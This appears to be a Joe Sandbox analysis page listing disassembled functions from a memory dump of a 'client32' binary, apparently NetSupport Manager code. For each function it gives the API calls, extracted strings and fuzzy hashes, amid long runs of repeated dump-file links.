Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
String ID: deque<T> too long
API String ID: 827257264-309773918
Opcode ID: ca0d9d9c1b3117fae71b95f011d40ae9033231cd0910b8171d4419a53fd285b4
Instruction ID: 3f2339a9076695d70661dcab859014021b6c0d6f22495f28215c516d49704129
Opcode Fuzzy Hash: ca0d9d9c1b3117fae71b95f011d40ae9033231cd0910b8171d4419a53fd285b4
Instruction Fuzzy Hash: 6541E876E00115ABDB04CE68CC81BAEF7F6EF80614F19C6A9DC15D7344EA34EA418B91

Function 11125040 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 156COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 11125060

Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBC8
Part of subcall function 1115CBB3: __CxxThrowException@8.LIBCMT ref: 1115CBDD
Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBEE

_memmove.LIBCMT ref: 111250EA
_memmove.LIBCMT ref: 1112510E
_memmove.LIBCMT ref: 11125148
_memmove.LIBCMT ref: 11125164
std::exception::exception.LIBCMT ref: 111251AE
__CxxThrowException@8.LIBCMT ref: 111251C3

Strings

deque<T> too long, xrefs: 1112505B

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
String ID: deque<T> too long
API String ID: 827257264-309773918
Opcode ID: a4ca0833f89cb949e8c6ff4a971e5aaf4e212e7777e7c70b2ce6ff60b8d225c5
Instruction ID: 0f323eff97a08ef0bfb1d310de9271f6685152ce05bf58ee348bace92ff13d14
Opcode Fuzzy Hash: a4ca0833f89cb949e8c6ff4a971e5aaf4e212e7777e7c70b2ce6ff60b8d225c5
Instruction Fuzzy Hash: 0541E776E00115ABDB54CE68CCC1AEEF7E5EF84214F69C668D81AD7344EA34EA41CBD0

Function 1103B530 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 1110B5F0: timeGetTime.WINMM ref: 1110B5FD

Part of subcall function 110F6220: _memset.LIBCMT ref: 110F6245
Part of subcall function 110F6220: GetACP.KERNEL32(0220B858,DBCS,Charset,932=*128), ref: 110F62AE

Sleep.KERNEL32(00000032,?), ref: 1103B642
GetDC.USER32(00000000), ref: 1103B64A
GetPixel.GDI32(00000000,00000000,00000000), ref: 1103B657
SetPixel.GDI32(00000000,00000000,00000000,00000000), ref: 1103B663
ReleaseDC.USER32(00000000,00000000), ref: 1103B66C

Strings

DoFlushOptimal, maxcb=%d, cb=%d, gcb=%d, xrefs: 1103B589
limitcolorbits, xrefs: 1103B5B2
View, xrefs: 1103B5B7

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Pixel$ReleaseSleepTime_memsettime
String ID: DoFlushOptimal, maxcb=%d, cb=%d, gcb=%d$View$limitcolorbits
API String ID: 686385934-1413253680
Opcode ID: d5852c839270aa23ef5ae38c366fd629fbc8cd0939447888d43a8d295bfa1ddf
Instruction ID: f16d89a374e4fe568ab7d55a1f425cdb876f14b981240f7c8f6700600d478685
Opcode Fuzzy Hash: d5852c839270aa23ef5ae38c366fd629fbc8cd0939447888d43a8d295bfa1ddf
Instruction Fuzzy Hash: 31419535E0161E9FEF15CFA4CD95BFEB7A5EB84309F10416DE916A7280EB34A90087A1

Function 110051C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(?), ref: 110051CE
_memset.LIBCMT ref: 110051F0
GetMenuItemID.USER32(?,00000000), ref: 11005204
CheckMenuItem.USER32(?,00000000,00000000), ref: 11005261
EnableMenuItem.USER32(?,00000000,00000000), ref: 11005277
GetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005298
SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 110052C4

Strings

0, xrefs: 110051FD

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ItemMenu$Info$CheckCountEnable_memset
String ID: 0
API String ID: 2755257978-4108050209
Opcode ID: 30e732c661686793a5b6a227507d1879ad683f9c8e26dd4348ab49c0c8fb9c12
Instruction ID: 151c37117e6a4efcf468b3f2afefe3ee8c103672a57a50470b6f5af14a9aa5dd
Opcode Fuzzy Hash: 30e732c661686793a5b6a227507d1879ad683f9c8e26dd4348ab49c0c8fb9c12
Instruction Fuzzy Hash: A031A370D0121ABBEB01DFA4D889BEEBBFCEF46358F008159F951E6240E7759A44CB51

Function 1101D410 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 100registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1101D440
GetClassInfoExA.USER32(00000000,NSMChatSizeWnd,?), ref: 1101D45A
_memset.LIBCMT ref: 1101D46A
RegisterClassExA.USER32(?), ref: 1101D4AB
CreateWindowExA.USER32(00000000,NSMChatSizeWnd,11190240,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 1101D4DE
GetWindowRect.USER32(00000000,?), ref: 1101D4EB
DestroyWindow.USER32(00000000), ref: 1101D4F2

Strings

NSMChatSizeWnd, xrefs: 1101D44C, 1101D4A1, 1101D4D8

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$Class_memset$CreateDestroyInfoRectRegister
String ID: NSMChatSizeWnd
API String ID: 2883038198-4119039562
Opcode ID: 278526c9658a69e7a40e6cb25d6626fde906cf365c21d4dc24fc7d5a55472854
Instruction ID: dcbcbcf091995d4067a9012f4e3e9d0ed9d195d12c757acb72af4b7ecf5f03b9
Opcode Fuzzy Hash: 278526c9658a69e7a40e6cb25d6626fde906cf365c21d4dc24fc7d5a55472854
Instruction Fuzzy Hash: D63180B5D0121DAFCB10DFA5DDC4AEEFBB8EB48318F20456EF925A3240D73569018B61

Function 110094B0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 92fileCOMMON

Download Yara Rule

APIs

_strncmp.LIBCMT ref: 110094EA
_strncmp.LIBCMT ref: 110094FA
WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,CF3D35D0), ref: 1100959B

Strings

http://, xrefs: 110094E5, 110094F8
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 11009550, 11009578
<tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16"> </p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td> </td><td , xrefs: 11009521
https://, xrefs: 110094DF
IsA(), xrefs: 11009555, 1100957D

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strncmp$FileWrite
String ID: <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16"> </p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td> </td><td $IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://$https://
API String ID: 1635020204-3154135529
Opcode ID: 35d060acf12ccdd480c04a845a76d973b580c562fc5caea60c424b02d90a38e1
Instruction ID: d20e6e8e82cea177770e9d14c68faf5d1120bac870e30f80c07a18668992f196
Opcode Fuzzy Hash: 35d060acf12ccdd480c04a845a76d973b580c562fc5caea60c424b02d90a38e1
Instruction Fuzzy Hash: 71315C75E0065AABDB00DF95DC84FDEB7B8EF49658F004259E825A7280EB35A604CBA1

Function 1114F1D0 Relevance: 13.6, APIs: 9, Instructions: 128windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 1114F203
CreateCompatibleDC.GDI32(00000000), ref: 1114F219
SelectPalette.GDI32(00000000,?,00000000), ref: 1114F2FF
CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 1114F327
SelectObject.GDI32(00000000,00000000), ref: 1114F33B
SelectObject.GDI32(00000000,?), ref: 1114F361
SelectPalette.GDI32(00000000,?,00000000), ref: 1114F371
DeleteDC.GDI32(00000000), ref: 1114F378
ReleaseDC.USER32(00000000,?), ref: 1114F387

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Select$CreateObjectPalette$CompatibleDeleteReleaseSection
String ID:
API String ID: 602542589-0
Opcode ID: f9837fefdf0f1fbb5651e24b3a8078af4e21e61c33b31645051b8c91f3a50013
Instruction ID: f8b28bdea48ec2611b1f91f2bbafde9b68da4a4719e2569757cfb30afdba7c1c
Opcode Fuzzy Hash: f9837fefdf0f1fbb5651e24b3a8078af4e21e61c33b31645051b8c91f3a50013
Instruction Fuzzy Hash: 7851DAF5E012299FDB60DF28CD8479DBBB9EF88604F5091EAE609E3240D7705A81CF59

Function 1100D3B0 Relevance: 13.6, APIs: 9, Instructions: 75libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,111918F0), ref: 1100D3C4
GetProcAddress.KERNEL32(00000000,111918E0), ref: 1100D3D8
GetProcAddress.KERNEL32(00000000,111918D0), ref: 1100D3ED
GetProcAddress.KERNEL32(00000000,111918C0), ref: 1100D401
GetProcAddress.KERNEL32(00000000,111918B4), ref: 1100D415
GetProcAddress.KERNEL32(00000000,11191894), ref: 1100D42A
GetProcAddress.KERNEL32(00000000,11191874), ref: 1100D43E
GetProcAddress.KERNEL32(00000000,11191864), ref: 1100D452
GetProcAddress.KERNEL32(00000000,11191854), ref: 1100D467

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 2be2e3181ad7e37179dd4622537a04b9d19e6dc6cc5aab668c0a44b38469d94a
Instruction ID: 9f027eddd4dddc581f186f25ec93b792fa700742cd5a4619bf017c7ec0e1ed24
Opcode Fuzzy Hash: 2be2e3181ad7e37179dd4622537a04b9d19e6dc6cc5aab668c0a44b38469d94a
Instruction Fuzzy Hash: 4B31BBB59122349FE706DBE4C8D5A76B7E9E34C758F00857AE93083248D7F4A881CFA0

Function 1106D060 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 190COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,CF3D35D0,?,?,?), ref: 1106D0E2
SetEvent.KERNEL32(?,?,00000000,1106AF10,?,?,?,?,?), ref: 1106D1C2

Strings

Deregister NC_CHATEX for conn=%s, q=%p, xrefs: 1106D0C5
erased=%d, idata->dead=%d, xrefs: 1106D293
..\ctl32\Connect.cpp, xrefs: 1106D2AA

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalEnterEventSection
String ID: ..\ctl32\Connect.cpp$Deregister NC_CHATEX for conn=%s, q=%p$erased=%d, idata->dead=%d
API String ID: 2291802058-2272698802
Opcode ID: 4c4459f730ece1a7db6b629c2ae3fc9ade6f363c06eb62c3d438a519b44550e4
Instruction ID: b22ba82a88fbe9628385044aa67eb00d20c4b44079c4ac5070634ae5489f2a97
Opcode Fuzzy Hash: 4c4459f730ece1a7db6b629c2ae3fc9ade6f363c06eb62c3d438a519b44550e4
Instruction Fuzzy Hash: EE71BC70E00286EFEB15CF64C884F9DBBF9AB04314F0481D9E44A9B291D770E9C5CB90

Function 1101D550 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 188COMMON

Download Yara Rule

APIs

InflateRect.USER32(?,000000FF,000000FF), ref: 1101D5C4
InflateRect.USER32(?,000000FF,000000FF), ref: 1101D5F4
InflateRect.USER32(?,000000FF,000000FF), ref: 1101D618
GetBkColor.GDI32(?), ref: 1101D61E
GetTextColor.GDI32(?), ref: 1101D6A5

Strings

VUUU, xrefs: 1101D6F0
VUUU, xrefs: 1101D656

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InflateRect$Color$Text
String ID: VUUU$VUUU
API String ID: 1214208285-3149182767
Opcode ID: ce653334c1269ec63752947323ce46a0191a89749b5b5a7eff72ef3103528f33
Instruction ID: 77e576ce41c6bbc1f275e9696d100ffe4c5213a4300096d6b7fb60596d00f56b
Opcode Fuzzy Hash: ce653334c1269ec63752947323ce46a0191a89749b5b5a7eff72ef3103528f33
Instruction Fuzzy Hash: A0617075E0021A9BCB04CFA8C881AAEF7F5FF98324F148629E415E7385D634FA05CB94

Function 110B3590 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

Part of subcall function 1110C520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1110D1BD,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C53E

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

InitializeCriticalSection.KERNEL32(0000002C,?,?,?,?,?,?,?,00000000,111814A6,000000FF), ref: 110B3615
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000,111814A6,000000FF), ref: 110B361F
GetVersion.KERNEL32(?,?,?,?,?,?,?,00000000,111814A6,000000FF), ref: 110B363A
std::exception::exception.LIBCMT ref: 110B3689
__CxxThrowException@8.LIBCMT ref: 110B369E
std::_Xinvalid_argument.LIBCPMT ref: 110B36ED

Strings

vector<T> too long, xrefs: 110B36E8

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
